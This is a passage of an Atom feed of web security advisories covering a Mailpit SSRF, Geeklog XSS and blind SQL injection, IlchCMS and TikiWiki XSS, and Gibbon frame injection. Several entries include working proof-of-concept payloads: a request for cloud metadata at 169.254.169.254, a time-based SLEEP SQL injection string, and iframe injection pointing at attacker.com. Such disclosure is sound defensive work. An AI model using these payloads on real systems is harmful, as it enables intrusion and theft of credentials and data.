		<updated>2026-01-06T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A Server-Side Request Forgery (SSRF) vulnerability exists in Mailpit&#39;s /proxy endpoint that allows attackers to make requests to internal network resources.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; &amp;lt; 1.28.0&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; &lt;code&gt;/api/v1/proxy&lt;/code&gt; endpoint&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected Parameter:&lt;/strong&gt; &lt;code&gt;url&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; The vulnerability exists due to insufficient validation of user-supplied URLs. Attackers can supply internal URLs that the server will fetch on their behalf.&lt;/p&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required&lt;/li&gt;
&lt;li&gt;Direct access to the Mailpit web interface&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Access internal services (databases, APIs)&lt;/li&gt;
&lt;li&gt;Scan internal network resources&lt;/li&gt;
&lt;li&gt;Access cloud metadata endpoints (AWS, GCP, Azure)&lt;/li&gt;
&lt;li&gt;Potentially pivot to internal systems&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;pre class=&quot;language-http&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-http&quot;&gt;&lt;span class=&quot;token request-line&quot;&gt;&lt;span class=&quot;token method property&quot;&gt;GET&lt;/span&gt; &lt;span class=&quot;token request-target url&quot;&gt;/api/v1/proxy?url=http://169.254.169.254/latest/meta-data/&lt;/span&gt; &lt;span class=&quot;token http-version property&quot;&gt;HTTP/1.1&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token header&quot;&gt;&lt;span class=&quot;token header-name keyword&quot;&gt;Host&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token header-value&quot;&gt;mailpit.target.com&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to Mailpit version 1.28.1 or later, which includes proper URL validation for the proxy endpoint.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr&quot;&gt;GitHub Advisory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/axllent/mailpit/releases/tag/v1.28.1&quot;&gt;Mailpit Release Notes&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>Geeklog 2.2.1 - Cross-site Scripting</title>
		<link href="https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/"/>
		<updated>2020-01-01T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A Cross-site Scripting (XSS) vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to inject arbitrary web script or HTML.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; 2.2.1 and earlier&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; Insufficient input validation and output encoding allows attackers to inject malicious scripts.&lt;/p&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required&lt;/li&gt;
&lt;li&gt;Victim must visit a crafted URL or page&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Steal user session cookies&lt;/li&gt;
&lt;li&gt;Perform actions on behalf of users&lt;/li&gt;
&lt;li&gt;Access CMS content&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Details available upon request.&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to a patched version of Geeklog that includes proper input sanitization.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-001-geeklog-2-2-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.invicti.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/&quot;&gt;Invicti Advisory NS-20-001&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>Geeklog 2.2.1 - Blind SQL Injection</title>
		<link href="https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/"/>
		<updated>2020-01-01T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A Blind SQL Injection vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to execute arbitrary SQL commands via the &lt;code&gt;uid&lt;/code&gt; parameter in &lt;code&gt;comment.php&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; 2.2.1 and earlier&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; &lt;code&gt;comment.php&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected Parameter:&lt;/strong&gt; &lt;code&gt;uid&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; Insufficient input validation on the &lt;code&gt;uid&lt;/code&gt; parameter allows SQL Injection attacks.&lt;/p&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required&lt;/li&gt;
&lt;li&gt;Direct access to the comment endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Extract sensitive data from the database&lt;/li&gt;
&lt;li&gt;Bypass authentication mechanisms&lt;/li&gt;
&lt;li&gt;Modify or delete database content&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;pre class=&quot;language-http&quot; tabindex=&quot;0&quot;&gt;&lt;code class=&quot;language-http&quot;&gt;&lt;span class=&quot;token request-line&quot;&gt;&lt;span class=&quot;token method property&quot;&gt;POST&lt;/span&gt; &lt;span class=&quot;token request-target url&quot;&gt;/geeklog-2.2.1/public_html/comment.php&lt;/span&gt; &lt;span class=&quot;token http-version property&quot;&gt;HTTP/1.1&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token header&quot;&gt;&lt;span class=&quot;token header-name keyword&quot;&gt;Host&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token header-value&quot;&gt;target.com&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token header&quot;&gt;&lt;span class=&quot;token header-name keyword&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token header-value&quot;&gt;application/x-www-form-urlencoded&lt;/span&gt;&lt;/span&gt;

uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*&#39;XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR&#39;|&quot;XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR&quot;*/&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Time-based Blind SQL Injection:&lt;/strong&gt; If the server response is delayed by 25 seconds, the target is vulnerable.&lt;/p&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to a patched version of Geeklog that includes proper input sanitization and parameterized queries.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-002-geeklog-2-2-1-blind-sql-injection/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.invicti.com/web-applications-advisories/ns-20-002-blind-sql-injection-in-geeklog/&quot;&gt;Invicti Advisory NS-20-002&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>IlchCMS 2.1.37 - Cross-site Scripting</title>
		<link href="https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/"/>
		<updated>2020-01-01T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A Cross-site Scripting (XSS) vulnerability exists in IlchCMS version 2.1.37. The vulnerability allows remote attackers to inject arbitrary web script or HTML.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; 2.1.37 and earlier&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; Insufficient input validation and output encoding allows attackers to inject malicious scripts.&lt;/p&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required&lt;/li&gt;
&lt;li&gt;Victim must visit a crafted URL or page&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Steal user session cookies&lt;/li&gt;
&lt;li&gt;Perform actions on behalf of users&lt;/li&gt;
&lt;li&gt;Redirect users to malicious websites&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Details available upon request.&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to a patched version of IlchCMS that includes proper input sanitization.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-20-003-ilchcms-2-1-37-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Vendor notification sent&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>Gibbon v14.0.01 - Frame Injection Vulnerabilities</title>
		<link href="https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/"/>
		<updated>2018-06-28T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Frame Injection vulnerabilities exist in Gibbon v14.0.01. These vulnerabilities allow remote attackers to inject arbitrary HTML frames into the application.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; v14.0.01 and earlier&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; Insufficient input validation allows attackers to inject iframe elements.&lt;/p&gt;
&lt;h2 id=&quot;technical-details&quot; tabindex=&quot;-1&quot;&gt;Technical Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Install Page:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;URL: &lt;code&gt;/gibbon-install/installer/install.php?step=2&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Parameters: &lt;code&gt;databaseServer&lt;/code&gt;, &lt;code&gt;databaseUsername&lt;/code&gt; (POST)&lt;/li&gt;
&lt;li&gt;Attack Pattern: &lt;code&gt;&amp;lt;iframe src=&amp;quot;http://attacker.com/&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Frontend:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;URL: &lt;code&gt;/core/index.php?q=/modules/Resources/resources_view.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Parameter: &lt;code&gt;tag&lt;/code&gt; (GET)&lt;/li&gt;
&lt;li&gt;Attack Pattern: &lt;code&gt;&amp;lt;iframe src=&amp;quot;http://attacker.com/&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required for frontend vulnerability&lt;/li&gt;
&lt;li&gt;Access to install page (typically restricted)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit these vulnerabilities to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Inject malicious frames into the application&lt;/li&gt;
&lt;li&gt;Perform clickjacking attacks&lt;/li&gt;
&lt;li&gt;Load external malicious content&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Update to a patched version of Gibbon.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-012-gibbon-v14-0-01-frame-injection-vulnerabilities/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.invicti.com/web-applications-advisories/ns-18-002-frame-injection-vulnerabilities-in-gibbon&quot;&gt;Invicti Advisory NS-18-002&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
	
	<entry>
		<title>TikiWiki 17.1 - Cross-site Scripting</title>
		<link href="https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/"/>
		<updated>2018-01-01T00:00:00Z</updated>
		<id>https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/</id>
		<content type="html">&lt;h2 id=&quot;overview&quot; tabindex=&quot;-1&quot;&gt;Overview &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A Cross-site Scripting (XSS) vulnerability exists in TikiWiki CMS version 17.1. The vulnerability allows remote attackers to inject arbitrary web script or HTML.&lt;/p&gt;
&lt;h2 id=&quot;vulnerability-details&quot; tabindex=&quot;-1&quot;&gt;Vulnerability Details &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Affected Versions:&lt;/strong&gt; 17.1 and earlier&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; Insufficient input validation and output encoding allows attackers to inject malicious scripts.&lt;/p&gt;
&lt;h2 id=&quot;exploitation-requirements&quot; tabindex=&quot;-1&quot;&gt;Exploitation Requirements &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;No authentication required&lt;/li&gt;
&lt;li&gt;Victim must visit a crafted URL or page&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;impact&quot; tabindex=&quot;-1&quot;&gt;Impact &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Remote attackers can exploit this vulnerability to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Steal admin session cookies&lt;/li&gt;
&lt;li&gt;Access wiki content&lt;/li&gt;
&lt;li&gt;Perform actions on behalf of users&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;proof-of-concept&quot; tabindex=&quot;-1&quot;&gt;Proof of Concept &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Details available upon request.&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&quot;solution&quot; tabindex=&quot;-1&quot;&gt;Solution &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Upgrade to a patched version of TikiWiki that includes proper input sanitization.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References &lt;a class=&quot;header-anchor&quot; href=&quot;https://rosecurify.com/advisories/RO-18-001-tikiwiki-17-1-cross-site-scripting/&quot;&gt;#&lt;/a&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Vendor notification sent&lt;/li&gt;
&lt;/ul&gt;
</content>
	</entry>
</feed>
